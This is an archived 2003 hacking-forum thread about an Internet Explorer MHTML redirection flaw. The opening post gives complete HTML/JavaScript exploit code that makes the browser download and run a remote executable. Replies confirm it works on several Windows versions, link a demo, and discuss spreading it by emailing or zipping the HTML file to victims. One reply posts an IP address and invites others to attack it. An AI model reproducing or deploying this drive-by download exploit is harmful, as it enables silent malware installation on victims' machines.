gsicht
Nov 28 2003, 02:23 PM
advisory:
http://packetstormsecurity.org/0311-adviso.../mhtmlredir.txtdo you know this vulnerbility? i've found some html code for this:
| CODE |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<script>
WaitForDocumentCached_TIME=100;
function LaunchRemoteExe_Step2()
{
//One more fresh action is present for more stable performance
for(i=1;i<=2;i++)
w.document.execCommand("Refresh");
}
function LaunchRemoteExe(ExeUrl)
{
w=window.open("about:blank","_blank","width=300 height=400 resizable=yes location=yes");
w.document.write("<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111113' CODEBASE='mhtml:file://C:\NO_SUCH_MHT.MHT!" + ExeUrl + "'>");
setTimeout("LaunchRemoteExe_Step2()",WaitForDocumentCached_TIME);
}
LaunchRemoteExe("http://127.0.0.1/EXE.EXE") <!-- and end it with -->
</script>
</head>
<body>
<table width="100%" border="0" cellspacing="1" cellpadding="1">
<tr>
<td width="15%" height="341" align="left" valign="top"><p><a href="http://www.governmentsecurity.org/forum/"><img src="../new_images/forums2.png" alt="hacking exploits security forum" width="189" height="102" border="0" /></a><br />
<a href="http://www.governmentsecurity.org/forum/"><img src="../new_images/hacking.png" alt="hacking" width="190" height="84" border="0" /></a><br/>
<a href="../compliance.php"><img src="../new_images/compliance_articles.png" alt="compliance articles" width="190" height="84" border="0" /></a><br/>
<a href="http://governmentsecurity.bitpipe.com/data/detail?id=1206033259_610&type=RES&psrc=TPP"><img src="../new_images/main_ad_1.png" alt="security white papers" width="190" height="84" border="0" /></a><br/>
<a href="../directory.php"><img src="../new_images/main_ad_2.png" alt="information security consultant" width="190" height="84" border="0" /></a></p>
</td>
<td width="85%" align="left" valign="top">
</body>
</html>
|
it will download and execute exe.exe from
http://127.0.0.1/.
can someone test this code. i dont have the ie
liquidSilver
Nov 28 2003, 03:58 PM
Hello..
I will test it locally. Be right back with results.
Regards,
LiquidSilver.
liquidSilver
Nov 28 2003, 04:05 PM
No results at all.. Hmm.. I try some other methods.
Regards,
LiquidSilver.
gsicht
Nov 28 2003, 04:16 PM
i think its a very interesting bug.
here is a harmless example how to exploit:
http://www.safecenter.net/UMBRELLAWEBV4/1s...Demo/index.html
liquidSilver
Nov 28 2003, 04:31 PM
Hello..
Quote from the site:
| QUOTE |
This demo assumes
1.WinXp or Win2k3 is installed at C:\WINDOWS.
2.A small web page(less than 3 kbyte) can be downloaded within 4 seconds.
|
I am currently running Win98 on this computer, I will try it on my other Win2k computer later on.
Yes, it can be a very intresting code - but what did I just download?! PayLoad.exe?! uhm..?!
Regards,
LiquidSilver.
liquidSilver
Nov 28 2003, 04:34 PM
Ah, I checked the exe file, it was emtpy.. hehe.
tareq
Nov 28 2003, 04:50 PM
it wont work mate
i tested it on my self winxp sp1 5.1.2600
Axl
Nov 29 2003, 09:20 AM
the second one looks nice !
thanks !
gogu258
Dec 1 2003, 12:34 AM
It works on W2K (Windows 2000) but only local, I think it should work on XP and 2003 , little research but with good result on W2K. It download exe file and run but as I told you before only if you open page on your system.
extreme
Dec 2 2003, 01:00 AM
Well, it wasn't ment to work remotely. But it should be enough too. Just attach HTML file in email.. Who would think that HTML file could be infected..?!?
jawz
Dec 3 2003, 09:29 PM
The exploit works on my Windows XP. Fortunately, McAfee is able to detect et neutralize the exploit (Exploit-CodeBase).
aiboforcen
Dec 4 2003, 03:17 PM
www.safecenter.net/UMBRELLAWEBV4/1stCleanRc/1stCleanRc-Demo/index.htmlThis exploit works fine for me to. But when i upload the exploit to another asp host it wont work anymore. I think its very strange because i havent changed the code and I have tried atleast 3 different web hosts wich supporte asp.
Anyone got any sulotion ?
mnemonix
Dec 8 2003, 11:52 AM
Works on xp sp1
Some nice work
gogu258
Dec 8 2003, 08:16 PM
There you have another problem, if your target doesn't use Outlook or something like that....like Yahoo email, your attachment will be show as web page, but remote not local....so you have to use it as zip file.....
FiStEh
Dec 9 2003, 04:46 PM
F-secure anti-virus picked up the malicious code. Do'h that wouldve been nice
FiStEy
billkennedy32
Dec 9 2003, 05:41 PM
1clean works remotely
just install IIS and copy the files to root.
http://216.126.97.46/Feal free to hack the #*@t out of it scann, explo what ever
good practice
have fun
gogu258
Dec 9 2003, 06:05 PM
Hi,
It works on XP and w2k3 but no 2K.
aiboforcen
Dec 10 2003, 09:56 AM
I heard that iis on win2k only allow 5 users visiting ur site at the same time. Is it possible to get around this ? can i upgrade iis mabey ?
sonej
Dec 15 2003, 01:42 PM
The first code works great for me.
(Windows 2000 Server SP4)
piopio
Feb 2 2004, 01:22 PM
if u have getright or dap, it promps u 4 download the file.... this isn't good..
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please
click here.
